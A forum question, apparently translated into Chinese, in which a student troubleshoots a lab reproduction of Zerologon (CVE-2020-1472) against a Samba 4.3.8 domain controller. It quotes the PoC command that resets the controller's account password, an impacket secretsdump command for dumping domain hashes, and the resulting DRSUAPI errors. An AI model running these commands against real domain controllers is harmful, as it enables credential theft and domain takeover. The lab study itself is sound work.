我有一个学校项目,需要我在本地环境中模拟CVE-2020-1472 (Zerologon) 。我目前正在尝试测试以下github 脚本,但我遇到了一些从那时起我无法解决的问题。
总而言之,我有一个:
- 带有Samba 4.3.8 域控制器 Active Directory的Ubuntu 16.04机器
- Windows Server 2019加入了我使用 Samba 创建的域EXAMPLE.COM。
我已经进行了几次测试,我可以使用POC的第一部分成功修改“管理员”帐户的密码:
./cve-2020-1472-exploit.py -n EXAMPLE-DC -t 1.2.3.4
尝试运行impacket以从域中提取一些数据时出现问题:
secretsdump.py -no-pass -just-dc Domain/'DC_NETBIOS_NAME$'@DC_IP_ADDR
它成功登录,但随后我收到此消息:
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC - The naming context could not be found.
[*] Something wen't wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
更新 1:
我也尝试使用该-use-vss
选项,但登录后它也失败了。
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Searching for NTDS.dit
[-] 'NoneType' object has no attribute 'request'
[*] Cleaning up...
我试图获取一些关于的信息,DRSR SessionError: code: 0x20e4 - ERROR_DS_CANT_FIND_EXPECTED_NC
但我没有在互联网上找到任何有用的信息。我希望有人已经遇到过这个错误或者对 Active Directory 有了解,因为我真的被卡住了
在此先感谢您,祝您度过愉快的一周!
更新 2:
我在 impacket 的 github 上发表了一篇文章 ,似乎之前没有针对非 Windows AD 测试过 DRSUAPI 方法。所以 secretsdump 不会起作用。
每个页面都提到SAMBA是易受攻击的,所以我想知道他们是否真的进行了测试以利用该漏洞,或者这只是一个理论上的假设。